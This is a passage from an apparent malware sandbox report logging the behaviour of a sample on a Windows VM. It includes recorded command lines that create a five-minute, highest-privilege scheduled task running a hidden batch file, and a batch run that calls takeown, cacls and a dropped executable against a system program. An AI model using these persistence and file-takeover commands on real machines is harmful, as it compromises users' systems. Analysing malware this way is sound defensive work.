| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x76a2ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x76a2f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x76a306c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x76a2efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x76a2f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x7516c6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x770aee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x770855a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x770857e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x77089590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x77080820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x770afbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x771638f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x7717b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x7717b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x77167740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x771774e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x7717efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x77184ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x77174580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x77171540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x748e1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x748e1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x748e1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7527a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7527f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75277580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75279910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75286030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75285f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75285ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7527a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7527a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77cd40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77ccd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77ccecf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75285720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77cce140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77cceb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77d09990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77d05540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77cf9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7527a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x752a0a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74fa0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7527f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7527fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x752a1030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7527a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x752a14b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7527a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x752a16f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75279970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f23c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75278710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x752796e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-09 19:47:48 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #120: cmd.exe
55
0
| Information | Value |
|---|---|
| ID | #120 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\zhUe98iP.bat" /sc minute /mo 5 /RL HIGHEST /F |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:34, Reason: Child Process |
| Unmonitor | End Time: 00:02:50, Reason: Self Terminated |
| Monitor Duration | 00:00:16 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd48 |
| Parent PID | 0xcc0 (c:\windows\syswow64\wscript.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E5C
0x
D00
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000b20000 | 0x00b20000 | 0x04b1ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004b20000 | 0x04b20000 | 0x04b3ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004b20000 | 0x04b20000 | 0x04b2ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004b30000 | 0x04b30000 | 0x04b33fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b40000 | 0x04b40000 | 0x04b41fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004b40000 | 0x04b40000 | 0x04b43fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004b50000 | 0x04b50000 | 0x04b63fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004b70000 | 0x04b70000 | 0x04baffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004bb0000 | 0x04bb0000 | 0x04caffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004cb0000 | 0x04cb0000 | 0x04cb3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004cc0000 | 0x04cc0000 | 0x04cc0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004cd0000 | 0x04cd0000 | 0x04cd1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04ce0000 | 0x04d9dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004da0000 | 0x04da0000 | 0x04ddffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e50000 | 0x04e50000 | 0x04e5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e60000 | 0x04e60000 | 0x050dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004e60000 | 0x04e60000 | 0x04f5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f60000 | 0x04f60000 | 0x04fdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004fe0000 | 0x04fe0000 | 0x050dffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x050e0000 | 0x05416fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ea50000 | 0x7ea50000 | 0x7eb4ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007eb50000 | 0x7eb50000 | 0x7eb72fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007eb76000 | 0x7eb76000 | 0x7eb76fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eb77000 | 0x7eb77000 | 0x7eb79fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eb7a000 | 0x7eb7a000 | 0x7eb7afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007eb7d000 | 0x7eb7d000 | 0x7eb7ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
3 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 104, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\schtasks.exe | os_pid = 0xb48, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #122: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #122 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Journal\PDIALOG.exe"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:35, Reason: Child Process |
| Unmonitor | End Time: 00:03:19, Reason: Self Terminated |
| Monitor Duration | 00:00:44 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x76c |
| Parent PID | 0xda0 (c:\users\ciihmnxmn6ps\desktop\cary.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E54
0x
DD0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000f10000 | 0x00f10000 | 0x04f0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004f10000 | 0x04f10000 | 0x04f2ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004f10000 | 0x04f10000 | 0x04f1ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004f20000 | 0x04f20000 | 0x04f23fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f30000 | 0x04f30000 | 0x04f31fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f30000 | 0x04f30000 | 0x04f33fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004f40000 | 0x04f40000 | 0x04f53fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004f60000 | 0x04f60000 | 0x04f9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004fa0000 | 0x04fa0000 | 0x0509ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000050a0000 | 0x050a0000 | 0x050a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000050b0000 | 0x050b0000 | 0x050b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000050c0000 | 0x050c0000 | 0x050c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000050d0000 | 0x050d0000 | 0x050dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005100000 | 0x05100000 | 0x0510ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005110000 | 0x05110000 | 0x0536ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x05110000 | 0x051cdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000051d0000 | 0x051d0000 | 0x0520ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005270000 | 0x05270000 | 0x0536ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005370000 | 0x05370000 | 0x0546ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005470000 | 0x05470000 | 0x0558ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05590000 | 0x058c6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x748d0000 | 0x748d7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f260000 | 0x7f260000 | 0x7f35ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f360000 | 0x7f360000 | 0x7f382fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f386000 | 0x7f386000 | 0x7f388fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f389000 | 0x7f389000 | 0x7f389fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f38a000 | 0x7f38a000 | 0x7f38afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f38d000 | 0x7f38d000 | 0x7f38ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | G13k6QZj.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 72 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 51 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 18 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 56 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 216, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0x434, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0x824, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe | os_pid = 0xa90, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
